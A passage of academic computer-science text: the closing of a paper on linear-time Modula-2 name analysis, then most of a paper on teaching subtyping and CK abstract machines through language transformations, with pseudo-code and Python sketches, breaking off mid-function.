After all of the identifiers that are not included in nested procedures or modules have been processed, there is no need to remain within or return to the environment of the current procedure. Thus if that environment is left, it will never be re-entered. ProcVisit2 now applies itself to each immediately-nested procedure. It creates environments for those procedures, populates them with definitions, and looks up identifier uses within them. Each environment is created and then entered exactly once. Only after all identifier occurrences in a given scope have been dealt with does ProcVisit2 move on to another scope. Finally, ProcVisit2 invokes ModuleVisit2 for each immediately-nested module.
It is easy to see that Figures 10 and 11 enter each module’s environment twice (once in ModuleVisit1 and once in ModuleVisit2) and each procedure’s environment once (in ProcVisit2). Thus the complexity analysis of Section 4 holds, and Modula2 name analysis is \( O(N) \).
The constraint of a fixed number of environment entries and exits can be met with visit sequences other than those implied by Figures 10 and 11. For example, in ModuleVisit1 the for statements on the first two lines could be combined into a single traversal that visited all immediately-nested modules and procedures in textual order. When making such simplifications, however, it is important to verify that the constraint is, in fact, met: If we were to combine the for statements on the last two lines of ProcVisit2 into a single traversal that visited all immediately-nested modules and procedures in textual order then the constraint would be violated!
References
Language Transformations in the Classroom
Matteo Cimini
University of Massachusetts Lowell
Lowell, Massachusetts, USA
matteo_cimini@uml.edu
Benjamin Mourad
University of Massachusetts Lowell
Lowell, Massachusetts, USA
benjamin_mourad@student.uml.edu
Language transformations are algorithms that take a language specification as input and return a modified language specification. Language transformations are useful for automatically adding features such as subtyping to programming languages (PLs), and for automatically deriving abstract machines.
In this paper, we set forth the thesis that teaching programming language features with the help of language transformations, in addition to the planned material, can help students deepen their understanding of the features being taught.
We have conducted a study on integrating language transformations into an undergraduate PL course. We describe our study, the material that we have taught, and the exam submitted to students, and we present the results from this study. Although we refrain from drawing general conclusions on the effectiveness of language transformations, this paper offers encouraging data. We also offer this paper to inspire similar studies.
1 Introduction
Computer Science university curricula include undergraduate courses in programming languages (PLs). These courses vary greatly in the content they offer, and they go by various names, such as "Principles of Programming Languages" or "Organization of Programming Languages". Typically, the goal of these courses is not to teach one specific PL. Instead, students are exposed to the conceptual building blocks from which languages are assembled and to the various programming paradigms that exist, and they are challenged to think about PL features in their generality.
It is typical for these courses to cover PL features such as subtyping, abstract machines, type inference, and parametric polymorphism, among many others. Some of these features can be regarded as variations on a base PL. For example, it is not uncommon to design a PL and add subtyping afterwards. It is then interesting to understand which modifications must take place in order to incorporate subtyping into that base language. A good way to analyze this is by looking at how the formal typing rules need to change. Consider, for example, the typing rule of function application below on the left, and its version with (algorithmic) subtyping on the right.
\[
(T\text{-APP}) \;\; \frac{\Gamma \vdash e_1 : T_1 \rightarrow T_2 \qquad \Gamma \vdash e_2 : T_1}{\Gamma \vdash e_1 \, e_2 : T_2}
\qquad\qquad
(T\text{-APP}') \;\; \frac{\Gamma \vdash e_1 : T_{11} \rightarrow T_2 \qquad \Gamma \vdash e_2 : T_{12} \qquad T_{12} <: T_{11}}{\Gamma \vdash e_1 \, e_2 : T_2}
\]
\( (T\text{-APP}) \) rejects programs that pass an integer to a function that works on floating points, such as the program \((\lambda x : \text{float}.\ x)\ 3\), where \(\emptyset \vdash 3 : \text{int}\). This is because the type \(T_1\) in \(T_1 \rightarrow T_2\), which is the
domain of the function \(e_1\), needs to be the exact same type \(T_1\) of the argument \(e_2\). If we were to add subtyping, such a parameter passing would be accepted by the type system.
The first modification that \((T\text{-APP'})\) makes of \((T\text{-APP})\) is to let the domain of the function and the argument have different types. To do so, \((T\text{-APP'})\) assigns two different variables to the two occurrences of \(T_1\), that is, \(T_{11}\) for the domain of the function, and \(T_{12}\) for the type of the argument. Next, \((T\text{-APP'})\) needs to understand how \(T_{11}\) and \(T_{12}\) are related by subtyping. As \(T_{11}\) appears in contravariant position in \(T_{11} \rightarrow T_2\), it means that \(T_{11}\) describes the type of an input. The argument \(e_2\) will be provided as a value. Therefore, it is the type \(T_{12}\) of the argument that must be a subtype of \(T_{11}\), rather than the other way around, for example. Hence, the subtyping premise \(T_{12} <: T_{11}\) is added to \((T\text{-APP'})\).
We can describe these modifications with an algorithm that takes \((T\text{-APP})\), and automatically transforms it into \((T\text{-APP'})\). To summarize, such an algorithm must perform two steps:
- **Step 1**: Split equal types into fresh, distinct variables, and
- **Step 2**: Relate these new variables by subtyping according to the variance of types.
This type of algorithm can be formulated over a formal data type for language specifications. In other words, we can devise a procedure that takes a language specification in input (as a data type), and returns another language specification (with subtyping added). These algorithms are called *language transformations* [18]. One of the benefits of language transformations is that they do not apply just to one language. Instead, they can apply to several languages. For example, the two steps above can add subtyping for types other than the function type, such as pairs, lists, option types, and other simple types.
### Our Thesis
Another benefit of language transformations is that they highlight the central insights behind a feature being added. For example, **Step 1** and **Step 2** are key aspects of subtyping. Teaching students the algorithms that automatically apply **Step 1** and **Step 2** to languages can provide them with a firmer grasp of the concept of subtyping overall.
The approach is not limited to subtyping. The addition of other PL features can be formulated as language transformations, and taught to students in class as well. We think that exposing students to the language transformations for adding PL features may constitute a good addition in the classroom.
In this regard, however, we point out that we do not advocate for teaching PL features with the sole help of language transformations. For example, we teach subtyping using the material in the TAPL textbook [19], and we are skeptical that it would be a good idea to skip this material before introducing language transformations. This is because language transformations constitute quite a technical deep dive, and students could benefit from a gentler introduction of PL concepts.
Ultimately, in this paper we set forth the thesis that *using language transformations for teaching PL features, in addition to the planned material, can be beneficial for students to deepen their understanding of the features being taught.*
### Contributions of this Paper
We have experimented with teaching the language transformations for adding subtyping and deriving CK abstract machines [14]. We have conducted our study on two instances of an undergraduate course on programming languages.
In class, we have first introduced subtyping with material from TAPL [19], as mentioned above, and then we have taught the language transformations for adding subtyping (which we describe in Section 2.1). To evaluate whether our students gained a good understanding of subtyping, the final exam presented them with a language with operators that are not standard. Then, the exam asked students to add subtyping to these operators based on the language transformations that they have learned.
In the context of this study, we have collected information about students’ success in providing a correct answer to such a task. We describe the final exam in detail in Section 2.3, and we report on the results of this study in Section 3.
We have taught the topic of CK machines following the notes of Felleisen and Flatt [14]. We then have taught the language transformations for deriving CK machines (which we describe in Section 2.2). Analogously to subtyping, the final exam asked our students to derive the CK machine for a language with operators that are not standard. We then have collected information about students’ exam answers for this task, and we report on this data in Section 3. In total, the study involved 55 undergraduate students.
To summarize our contributions, in this paper:
• We set forth the thesis that language transformations can be a beneficial addition in PL courses, as formulated above.
• We describe the study that we have conducted, which includes the material that we have taught, and the exam submitted to the students.
• We present the results from our study. Although our results should not be considered conclusive, the data that we present is encouraging.
• We offer this paper to inspire similar studies towards gathering evidence for, or against, our thesis.
Roadmap of the Paper Section 2 describes the study that we have conducted, Section 3 presents our results, Section 4 describes our future work, and Section 5 concludes the paper.
2 Language Transformations in Class
General Details about the Course The course is at the undergraduate level, and is based on the TAPL textbook [19]. The course covers the typical topics of PL theory on defining syntax (BNF grammars), operational semantics, and type systems of PLs. The course also covers several other topics such as parameter passing, scoping mechanisms, subtyping, abstract machines, recursion, exceptions, dynamic typing, memory management, concurrency, and logic programming. Students are then familiar with the formalisms of operational semantics and type systems when the course covers the topics of subtyping and abstract machines.
The evaluations of the course include a long-term programming project in which students develop an interpreter for a functional language with references in OCaml, and a final exam with open-ended questions at the end of the course. The final exam tests our students on the topics of subtyping and abstract machines. We will describe our exam in Section 2.3.
Algorithms in Pseudo-Code Language transformations are algorithms, which raises the question of what syntax we should use to describe them. We took inspiration from courses in Algorithms and Data Structures, and from textbooks such as [10], where algorithms are described in pseudo-code. Therefore, we have used a pseudo-code that, to our estimation, was always intuitive to students, even though we did not thoroughly and precisely define it (as in [10]).
**Language Specifications** During the course, students acquire familiarity with formal definitions of programming languages, which they learn through TAPL. To recap, languages are defined with a BNF grammar and a set of inference rules. Inference rules are used to define a type system, a reduction relation, and auxiliary relations, if any. To make an example, we repeat the typical formulation of the simply-typed λ-calculus. We use a small-step operational semantics and evaluation contexts.
(Below, \( B \) is some base type.)
\[
\begin{align*}
\text{Type} & \quad T ::= T \to T \mid B \\
\text{Expression} & \quad e ::= x \mid \lambda x : T.\, e \mid e\ e \\
\text{Value} & \quad v ::= \lambda x : T.\, e \\
\text{Evaluation Context} & \quad E ::= [\,] \mid E\ e \mid v\ E \\
\text{Type Environment} & \quad \Gamma ::= \emptyset \mid \Gamma, x : T
\end{align*}
\]
\[
\begin{gathered}
\frac{x : T \in \Gamma}{\Gamma \vdash x : T}
\qquad
\frac{\Gamma, x : T_1 \vdash e : T_2}{\Gamma \vdash (\lambda x : T_1.\, e) : T_1 \to T_2}
\qquad
\frac{\Gamma \vdash e_1 : T_1 \to T_2 \quad \Gamma \vdash e_2 : T_1}{\Gamma \vdash e_1\ e_2 : T_2}
\\[2ex]
(\lambda x : T.\, e)\ v \longrightarrow e[v/x]
\qquad
\frac{e \longrightarrow e'}{E[e] \longrightarrow E[e']}
\end{gathered}
\]
We allow our pseudo-code to refer to parts of a language specification. For example, if the language \( L \) is the formulation of the simply-typed \( \lambda \)-calculus, then it contains both the grammar and the set of inference rules above. \( L.rules \) retrieves the set of inference rules. Given a rule \( r \), say \( (T\text{-APP}) \), \( r.premises \) retrieves the set of premises of \( (T\text{-APP}) \), which are the formulae above the horizontal line. \( r.conclusion \) retrieves the formula below the horizontal line. To our estimation, these references in the pseudo-code, as well as all other references, are rather intuitive, and they will be clear when we use them. (This is also the take on pseudo-code that [10] has, where a number of operations are not defined beforehand.)
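In class, this data type can also be shown concretely in code. The Python sketch below is one possible rendering (the field names mirror the accessors above; the tuple encoding of formulae and types is our own assumption, not a fixed format from the course):

```python
# A minimal sketch of the language-specification data type that the
# pseudo-code reads and writes. Premises are ("typing", expr, type)
# tuples, and arrow types are ("arrow", domain, codomain) tuples.
from dataclasses import dataclass, field

@dataclass
class Rule:
    name: str
    premises: list        # formulae above the horizontal line
    conclusion: tuple     # formula below the horizontal line

@dataclass
class Language:
    rules: list = field(default_factory=list)

# (T-APP), encoded with the conventions above.
t_app = Rule(
    name="T-APP",
    premises=[("typing", "e1", ("arrow", "T1", "T2")),
              ("typing", "e2", "T1")],
    conclusion=("typing", ("app", "e1", "e2"), "T2"),
)
stlc = Language(rules=[t_app])
```

With this representation, `stlc.rules`, `t_app.premises`, and `t_app.conclusion` behave exactly like the accessors `L.rules`, `r.premises`, and `r.conclusion` used by the pseudo-code.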
**Roadmap of this Section** Below, we describe our experiment on teaching subtyping (Section 2.1) and CK machines (Section 2.2). We also describe the final exam given to students (Section 2.3). Our pseudo-code for adding subtyping is based on an algorithm expressed in a domain-specific language in [18]. We are not aware of any analogous algorithm that corresponds to our pseudo-code for deriving CK machines. The next sections describe the algorithms that we have taught in class, of which we do not claim any theoretical results of correctness.
### 2.1 Language Transformation for Subtyping
In class, we have taught subtyping based on the corresponding chapters in the TAPL textbook [19]. Then, we have taught language transformation algorithms for adding subtyping to simple functional languages. The task of adding subtyping has been divided into the two steps that we have discussed in the introduction: 1) Split equal types, and 2) Relate new variables by subtyping according to the variance of types.
**Split Equal Types** This step modifies the typing rules of a language so that the variables that occur more than once in their premises are given different variable names. As we have seen in the introduction, this is the first step to let different expressions have different types. We define the procedure
**SPLIT-EQUAL-TYPES** to perform this step. The pseudo-code of **SPLIT-EQUAL-TYPES** is given below, which we explain subsequently.
**SPLIT-EQUAL-TYPES** \((P)\)
1. \(\text{newPremises} = \emptyset, \text{varmap} = \emptyset\)
2. \textbf{for each} \(p \in P\)
3. \hspace{1em} \textbf{if} \(p\) is of the form \(\Gamma \vdash e : \text{someType}\)
4. \hspace{2em} \textbf{for each} \(T \in \text{someType}\) s.t. \(T\) appears more than once in \(P\)
5. \hspace{3em} \(T' = \text{FRESH}(P)\)
6. \hspace{3em} \(p = p\) \textbf{where} \(T'\) replaces \(T\) in \(\text{someType}\)
7. \hspace{3em} \(\text{varmap}(T) = \text{varmap}(T) \cup \{T'\}\)
8. \hspace{1em} \(\text{newPremises} = \text{newPremises} \cup \{p\}\)
9. \textbf{return} \((\text{newPremises}, \text{varmap})\)
**SPLIT-EQUAL-TYPES** takes a set of premises \(P\) in input, and returns a pair with two components: a set of premises \(\text{newPremises}\), and a map \(\text{varmap}\). Here, \(\text{newPremises}\) is the same set of premises \(P\) in which each variable that occurs multiple times has been given fresh, distinct names. \(\text{varmap}\) maps each of the variables that have been replaced to the set of new variables that replaced them. The reason for collecting these new variables in \(\text{varmap}\) is that we need to relate them by subtyping. (This is the responsibility of the second step, which works based on the information in \(\text{varmap}\).)
To make an example, when **SPLIT-EQUAL-TYPES** is applied to the premises of (\text{T-APP}), we have
**Input:** \(P = \{\Gamma \vdash e_1 : T_1 \rightarrow T_2, \Gamma \vdash e_2 : T_1\}\)
**Output** = \((\text{newPremises}, \text{varmap})\) where
\[
\begin{align*}
\text{newPremises} &= \{\Gamma \vdash e_1 : T_{11} \rightarrow T_2, \Gamma \vdash e_2 : T_{12}\} \\
\text{varmap} &= \{T_1 \mapsto \{T_{11}, T_{12}\}\}
\end{align*}
\]
**SPLIT-EQUAL-TYPES** produces this output in the following way. Line 1 initializes \(\text{newPremises}\) to the empty set, and \(\text{varmap}\) to the empty map. The loop at lines 2-8 is executed for each premise \(p\) of the set of premises \(P\). For example, with (\text{T-APP}) we have two iterations; the first is with \(p = \Gamma \vdash e_1 : T_1 \rightarrow T_2\), and the second is with \(p = \Gamma \vdash e_2 : T_1\). Line 3 extracts the components of the typing premise. It does so in a style that is reminiscent of pattern-matching. The component that is relevant for the algorithm is \(\text{someType}\), which is the output type of the typing premise. The loop at lines 4-7 applies to each variable \(T\) in \(\text{someType}\) that appears more than once in the premises of \(P\). We focus on variables that have multiple occurrences because variables that occur only once do not need to be replaced with new names. For each of these variables \(T\), we generate a fresh variable that is not used in \(P\). We do so with \(\text{FRESH}(P)\) at line 5. Line 6 modifies the premise \(p\) by rewriting it to use the fresh variable in lieu of \(T\). Line 7 also updates \(\text{varmap}\) to add the fresh variable to the set of new variables mapped by \(T\). Line 8 adds \(p\) to \(\text{newPremises}\). At that point, \(p\) may have been modified with line 6, or may have remained unchanged. Finally, line 9 returns the pair \((\text{newPremises}, \text{varmap})\).
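To make the procedure fully concrete, here is a runnable Python sketch of SPLIT-EQUAL-TYPES under our own encoding of premises and types (this encoding is ours, for illustration). The sketch renames each occurrence of a repeated variable, which coincides with the pseudo-code on (T-APP), where every premise contains at most one occurrence of each variable:

```python
# Sketch of SPLIT-EQUAL-TYPES. Premises are ("typing", expr, type);
# types are variable names ("T1") or ("arrow", dom, cod) tuples.

def type_vars(t):
    """All occurrences of type variables in t, left to right."""
    if isinstance(t, str):
        return [t] if t.startswith("T") else []
    return [v for child in t[1:] for v in type_vars(child)]

def split_equal_types(premises):
    occurrences = [v for (_, _, ty) in premises for v in type_vars(ty)]
    counter, varmap = {}, {}

    def fresh(v):                      # FRESH(P): a name unused so far
        counter[v] = counter.get(v, 0) + 1
        return f"{v}_{counter[v]}"

    def rename(t):                     # replace repeated variables
        if isinstance(t, str):
            if t.startswith("T") and occurrences.count(t) > 1:
                v2 = fresh(t)
                varmap.setdefault(t, set()).add(v2)
                return v2
            return t
        return (t[0],) + tuple(rename(child) for child in t[1:])

    new_premises = [(kind, e, rename(ty)) for (kind, e, ty) in premises]
    return new_premises, varmap

# (T-APP): T1 occurs twice across the premises, T2 only once.
premises = [("typing", "e1", ("arrow", "T1", "T2")),
            ("typing", "e2", "T1")]
new_premises, varmap = split_equal_types(premises)
```

On the (T-APP) premises, the sketch leaves `T2` untouched and splits `T1` into two fresh names, recording both in `varmap`, which mirrors the example output above.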
**Relate New Variables by Subtyping** This second step is performed in the context of the procedure **ADD-SUBTYPING**. This is our general procedure that takes a language specification in input, and adds subtyping to it. To do so, **ADD-SUBTYPING** calls **SPLIT-EQUAL-TYPES**, and then works on the rules modified by **SPLIT-EQUAL-TYPES** to relate the new variables by subtyping.
The pseudo-code of **ADD-SUBTYPING** is the following.
ADD-SUBTYPING($L$)
1. \textbf{for each} rule $r \in L.rules$ s.t. $r.conclusion$ is of the form $\Gamma \vdash e : \text{someType}$
2. \hspace{1em} (newPremises, varmap) = SPLIT-EQUAL-TYPES($r.premises$)
3. \hspace{1em} \textbf{for each} mapping $(T \mapsto \text{setOfNewVars})$ in varmap
4. \hspace{2em} \textbf{if} there exists a type in setOfNewVars that is invariant in newPremises
5. \hspace{3em} \textbf{for each} $T_1, T_2 \in \text{setOfNewVars}$
6. \hspace{4em} newPremises = newPremises $\cup \{T_1 = T_2\}$
7. \hspace{2em} \textbf{elseif} there is exactly one type $T'$ in setOfNewVars that is contravariant in newPremises
8. \hspace{3em} \textbf{for each} $T_{\text{new}} \in (\text{setOfNewVars} \setminus T')$
9. \hspace{4em} newPremises = newPremises $\cup \{T_{\text{new}} <: T'\}$
10. \hspace{2em} \textbf{elseif} none in setOfNewVars is contravariant or invariant in newPremises
11. \hspace{3em} say that setOfNewVars = $\{T_1, T_2, \ldots, T_n\}$
12. \hspace{3em} newPremises = newPremises $\cup \{T = T_1 \lor T_2 \lor \ldots \lor T_n\}$
13. \hspace{2em} \textbf{else} error
14. \hspace{1em} $r.premises$ = newPremises
The argument $L$ is the language specification in input. The procedure modifies the rules of $L$ in place. Line 1 selects only the typing rules of $L$ (leaving out reduction rules, for example). It does so by selecting only the rules whose conclusion has the form of a typing formula. Lines 2-14 constitute the body of the loop, and apply for each of these rules. Line 2 calls SPLIT-EQUAL-TYPES, passing the premises of the typing rule as argument. This call returns the new premises and the map previously described. Lines 3-13 iterate over the key-value pairs of the map. Key-value pairs are of the form $T \mapsto \text{setOfNewVars}$, where $T$ is the variable that occurred in the original typing rule before calling SPLIT-EQUAL-TYPES. We dub $T$ as the original variable. Also, setOfNewVars contains the new variables generated by SPLIT-EQUAL-TYPES for $T$.
Lines 4-6 cover the case for when the original variable appeared in invariant position. In that case, there exists a variable in setOfNewVars that is in invariant position in newPremises, which we check with line 4. As the original variable appeared in invariant position, all the new variables must be related by equality. (We make an example shortly). Therefore, lines 5-6 add an equality premise for every two variables in setOfNewVars. This case covers operators such as the assignment in a language with references, as $T$ is invariant in a reference type Ref $T$. Consider the typing rule for the assignment operator on the left, and its version with subtyping on the right.
\[
(T\text{-ASSIGN}) \;
\frac{\Gamma \vdash e_1 : \text{Ref } T \quad \Gamma \vdash e_2 : T}
     {\Gamma \vdash e_1 := e_2 : \text{unitType}}
\quad \Rightarrow \quad
(T\text{-ASSIGN}') \;
\frac{\Gamma \vdash e_1 : \text{Ref } T_1 \quad \Gamma \vdash e_2 : T_2 \quad T_1 = T_2}
     {\Gamma \vdash e_1 := e_2 : \text{unitType}}
\]
Here, SPLIT-EQUAL-TYPES replaces $T$ with two new variables $T_1$ and $T_2$, but as $T$ is invariant in (T-ASSIGN), we generate the premise $T_1 = T_2$, which is the correct outcome.
Lines 7-9 cover the case for when the original variable appeared in a contravariant position. In that case, there exists a type $T'$ in setOfNewVars that is contravariant in newPremises. We detect such a case with line 7. Notice that line 7 also checks that the original variable appeared only once in contravariant position. We address this aspect later when we discuss line 13. As $T'$ appears in contravariant position, this is an input that is waiting to receive values. Therefore, we generate the subtyping premises that set all the other new variables in setOfNewVars as subtypes of $T'$ (lines 8-9). This case covers operators such
as the function application, which we have discussed previously. Thanks to lines 7-9, ADD-SUBTYPING generates the typing rule \((T\text{-APP'})\) from \((T\text{-APP})\), which is the correct outcome.
Lines 10-12 cover the case in which variance does not play a role. In this case, all the newly generated variables are peers. (We will make an example shortly). Therefore, we compute the join \(\lor\) for them [19]. This case applies to operators such as if-then-else. Consider the typing rule of if-then-else below on the left, and its version with subtyping on the right.
\[
(T\text{-IF}) \;
\frac{\Gamma \vdash e_1 : \text{Bool} \quad \Gamma \vdash e_2 : T \quad \Gamma \vdash e_3 : T}
     {\Gamma \vdash (\text{if } e_1\ e_2\ e_3) : T}
\qquad
(T\text{-IF}') \;
\frac{\Gamma \vdash e_1 : \text{Bool} \quad \Gamma \vdash e_2 : T_1 \quad \Gamma \vdash e_3 : T_2 \quad T = T_1 \lor T_2}
     {\Gamma \vdash (\text{if } e_1\ e_2\ e_3) : T}
\]
Here, SPLIT-EQUAL-TYPES replaces \(T\) with two new variables \(T_1\) and \(T_2\). Then, line 10 detects that variance does not play a role for these new variables. Indeed, the two branches of the if-then-else are peers. Therefore, lines 11 and 12 generate the premise that computes the join of all the new variables, and assign it to \(T\). Thanks to lines 10-12, \((T\text{-IF'})\) is precisely the typing rule that ADD-SUBTYPING generates, which is the correct outcome. Another example where variables are peers is with the case operator of the sum type.
Line 13 throws an error if none of the previous cases apply. This happens, for example, if a variable appears in contravariant position multiple times in the typing rule. Consider the following typing rule.
\[
\frac{\Gamma \vdash e_1 : T \to (T \to \text{Bool}) \quad \Gamma \vdash e_2 : T \times T}
     {\Gamma \vdash \text{app2 } e_1\ e_2 : \text{Bool}}
\]
Here, \(T\) appears in contravariant position twice in the type of \(e_1\). However, the typing rule of app2 cannot distinguish how the components of the pair \(e_2\) are going to be used. Consider two alternative reduction rules for app2:
\[
\text{app2 } e_1\ e_2 \longrightarrow ((e_1\ (\text{fst } e_2))\ (\text{snd } e_2))
\quad \text{or} \quad
\text{app2 } e_1\ e_2 \longrightarrow ((e_1\ (\text{snd } e_2))\ (\text{fst } e_2))
\]
The reduction rule on the left entails that the first component of the pair \(e_2\) must be subtype of the first \(T\) of \(T \to (T \to \text{Bool})\), and that the second component of the pair \(e_2\) must be subtype of the second \(T\) of \(T \to (T \to \text{Bool})\). Conversely, the reduction rule on the right entails that the second component of the pair \(e_2\) must be subtype of the first \(T\) of \(T \to (T \to \text{Bool})\), and that the first component of the pair \(e_2\) must be subtype of the second \(T\) of \(T \to (T \to \text{Bool})\).
However, ADD-SUBTYPING only analyzes the typing rule of app2, which alone is not informative enough to tell about the parameter passing to \(e_1\). Therefore, we do not know what subtyping premises to generate. In this case, ADD-SUBTYPING throws an error.
To solve this problem, we could extend ADD-SUBTYPING to analyze the reduction semantics of app2, but we observe that language designers may specify such semantics in a way that is as complex as they wish. Reduction rules may not use parameter passing immediately and evidently, in favor of jumping from operator to operator several times, which makes the analysis hard to do. For these reasons, we have not investigated this path, also because we may be speaking about cases that are quite uncommon, and not strictly necessary to cover in detail in our undergraduate class.
Finally, line 14 replaces the premises of $r$ with $newPremises$. The relations $\lor$ and $<:$ can be generated with an algorithm, too, but we omit showing these procedures here. In this paper, we simply want to illustrate the approach rather than strive for completeness.
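The case analysis of ADD-SUBTYPING (lines 3-13) can also be prototyped executably. The Python sketch below is our own illustration: it assumes our tuple encoding of premises and types, computes variance structurally (arrow domains flip polarity, Ref arguments are invariant, pair components are covariant), and emits equality, subtyping, or join premises accordingly:

```python
# Sketch of the case analysis in lines 3-13 of ADD-SUBTYPING.
# Premises are ("typing", expr, type); types are variable names or
# ("arrow", dom, cod), ("ref", t), ("pair", a, b) tuples.

def variances(t, pol="co"):
    """(variable, polarity) pairs for each occurrence: co, contra, inv."""
    flip = {"co": "contra", "contra": "co", "inv": "inv"}
    if isinstance(t, str):
        return [(t, pol)] if t.startswith("T") else []
    if t[0] == "arrow":
        return variances(t[1], flip[pol]) + variances(t[2], pol)
    if t[0] == "ref":
        return [(v, "inv") for (v, _) in variances(t[1], pol)]
    return [p for child in t[1:] for p in variances(child, pol)]

def relate(varmap, premises):
    """Emit equality, subtyping, or join premises for the new variables."""
    pol = {}
    for (_, _, ty) in premises:          # each new variable occurs once
        pol.update(dict(variances(ty)))
    extra = []
    for T, new_vars in varmap.items():
        ns = sorted(new_vars)
        contra = [v for v in ns if pol[v] == "contra"]
        if any(pol[v] == "inv" for v in ns):       # lines 4-6: equalities
            extra += [("eq", a, b) for i, a in enumerate(ns) for b in ns[i+1:]]
        elif len(contra) == 1:                     # lines 7-9: subtyping
            extra += [("sub", v, contra[0]) for v in ns if v != contra[0]]
        elif not contra:                           # lines 10-12: join
            extra.append(("join", T, ns))
        else:                                      # line 13: error
            raise ValueError(f"cannot add subtyping for {T}")
    return extra

# (T-APP) after splitting: T1_1 is contravariant, T1_2 covariant.
app = relate({"T1": {"T1_1", "T1_2"}},
             [("typing", "e1", ("arrow", "T1_1", "T2")),
              ("typing", "e2", "T1_2")])

# (T-IF) after splitting: the two branches are peers, so a join is emitted.
iff = relate({"T": {"T_1", "T_2"}},
             [("typing", "e2", "T_1"), ("typing", "e3", "T_2")])
```

On an app2-style rule, where two of the new variables end up in contravariant position, `relate` falls through to the error case, matching the discussion above.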
### 2.2 Language Transformation for CK
We have taught abstract machines following the notes of Felleisen and Flatt [14]. To recap, the CK machine remedies an inefficiency aspect of the reduction semantics. Consider the following reductions:
- $(\text{if } (\text{hd } [\text{false} \land ((\lambda x.\, x)\ \text{true}), \text{true}])\ e_1\ e_2) \rightarrow (\text{if } (\text{hd } [\text{false} \land \text{true}, \text{true}])\ e_1\ e_2)$
- $(\text{if } (\text{hd } [\text{false} \land \text{true}, \text{true}])\ e_1\ e_2) \rightarrow \ldots$

To perform the step at the top, the reduction semantics traverses the term and seeks the first available evaluation context, which points to the subterm $((\lambda x.\, x)\ \text{true})$. At the second step, the reduction semantics must seek again an available evaluation context, and does so by traversing the term again from the top-level if operator, which is inefficient.
To improve on this aspect, and avoid these recomputations, the CK machine carries a continuation data structure at run-time. The grammar for continuations, and the CK reduction rules for function application are the following.
($\text{mt}$ is the empty continuation, which denotes machine termination.)
\[
\text{Continuation } k ::= \text{mt} \mid \text{app}_1 e \ k \mid \text{app}_2 v \ k
\]
\[
\begin{align*}
(e_1\ e_2), k & \longrightarrow e_1, (\text{app}_1\ e_2\ k) & \text{Start} \\
v, (\text{app}_1\ e\ k) & \longrightarrow e, (\text{app}_2\ v\ k) & \text{Order} \\
v, (\text{app}_2\ (\lambda x.\, e)\ k) & \longrightarrow e[v/x], k & \text{Computation}
\end{align*}
\]
The reduction relation has the form $e, k \rightarrow e, k$, where $k$ is built with the continuation operators $\text{mt}$, $\text{app}_1$, and $\text{app}_2$. There is a continuation operator for each evaluation context. Each continuation operator always has an argument $k$, which is the next continuation, and one expression argument fewer than the corresponding operator, because one of the expressions is currently out as the focus of the evaluation. For example, $(\text{app}_2\ v\ k)$ means that the expression currently being evaluated will return as the second argument of the application, and $v$ is the function waiting for such argument.
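To let students see these three rules run, the CK machine for the untyped λ-calculus can be sketched in a few lines of code. The Python sketch below is our own illustration (the tuple encoding of terms and continuations is an assumption, not notation from the course):

```python
# A CK machine for the untyped lambda-calculus, following the Start,
# Order, and Computation rules above. Terms: ("var", x), ("lam", x, body),
# ("app", e1, e2); continuations: ("mt",), ("app1", e, k), ("app2", v, k).

def subst(e, x, v):
    """e[v/x]; sufficient for closed programs."""
    if e[0] == "var":
        return v if e[1] == x else e
    if e[0] == "lam":
        return e if e[1] == x else ("lam", e[1], subst(e[2], x, v))
    return ("app", subst(e[1], x, v), subst(e[2], x, v))

def is_value(e):
    return e[0] == "lam"

def step(e, k):
    if e[0] == "app":                          # Start
        return e[1], ("app1", e[2], k)
    if is_value(e) and k[0] == "app1":         # Order
        return k[1], ("app2", e, k[2])
    if is_value(e) and k[0] == "app2":         # Computation: beta-reduce
        lam = k[1]
        return subst(lam[2], lam[1], e), k[2]
    raise ValueError("stuck configuration")

def evaluate(e):
    k = ("mt",)                                # mt: machine termination
    while not (is_value(e) and k == ("mt",)):
        e, k = step(e, k)
    return e

identity = ("lam", "x", ("var", "x"))
```

Because the continuation is threaded through every step, no step re-traverses the term from the top, which is exactly the inefficiency the CK machine removes.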
Below, we show the language transformations for generating the CK machine, except for the procedure that generates the Computation rule above, because that procedure is straightforward.
#### Generating the Grammar for Continuations
The following pseudo-code generates the grammar Continuation.
```
CK-GENERATE-GRAMMAR(EvalCtx)
1 create grammar category Continuation, and add grammar item mt to it
2 for each (op t_1 ... t_n) ∈ EvalCtx
3   if t_i = E
4     add grammar item (op_i (t_1 ... t_n minus E) k) to Continuation
```
For each evaluation context, the index where the $E$ appears determines the index of the continuation operator. The arguments of this operator are all the arguments that are not $E$. Indeed, the argument at that position will currently be the focus of the evaluation. Also, the next continuation $k$ is the last argument.
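A runnable sketch of CK-GENERATE-GRAMMAR (in Python, with our own tuple encoding of evaluation contexts) makes this index bookkeeping concrete:

```python
# Sketch of CK-GENERATE-GRAMMAR. An evaluation context is (op, args)
# where args contains exactly one "E"; a continuation grammar item is a
# tuple whose head is op with the index of E appended, plus a final "k".

def ck_generate_grammar(eval_ctxs):
    items = [("mt",)]                         # line 1: the empty continuation
    for (op, args) in eval_ctxs:
        i = args.index("E") + 1               # the position of E names op_i
        rest = tuple(a for a in args if a != "E")
        items.append((f"{op}{i}",) + rest + ("k",))
    return items

# The two evaluation contexts of function application: E e and v E.
app_ctxs = [("app", ("E", "e")), ("app", ("v", "E"))]
```

On `app_ctxs`, the sketch produces the grammar items $\text{mt}$, $(\text{app}_1\ e\ k)$, and $(\text{app}_2\ v\ k)$ shown earlier.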
Generating the Start rule The following pseudo-code generates the reduction rule \texttt{Start}, which brings the computation of an operator into using continuation operators.
\begin{verbatim}
CK-GENERATE-START(Continuations)
1 find (op_i t_1 ... t_n k) in Continuations with no v
2 add reduction rule (op t_1 ... e ... t_n), k -> e, (op_i t_1 ... t_n k)
\end{verbatim}
Here, \(e\) appears at position \(i\) in \(op\). If a continuation contains some \(v\) as arguments, it means that those arguments must have been the subject of some other evaluation context that evaluated them to a value. Therefore, that cannot be the starting point. Our starting point, instead, is a continuation that contains no \(v\). The reduction rule that we add takes the operator into using the continuation operator that we have just found.
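CK-GENERATE-START can be sketched analogously. In the Python sketch below (our own encoding: a continuation is a triple of operator name, 0-based focus position, and remaining arguments), the generated rule is rendered as a schematic string:

```python
# Sketch of CK-GENERATE-START. A continuation is (op, i, args), where i
# is the position of the argument currently in focus and args are the
# remaining arguments ("e" for expressions, "v" for values).

def ck_generate_start(continuations):
    # line 1: the starting continuation is the one carrying no value yet
    (op, i, args) = next(c for c in continuations if "v" not in c[2])
    operands = list(args)
    operands.insert(i, "e")                   # reinsert the focused e
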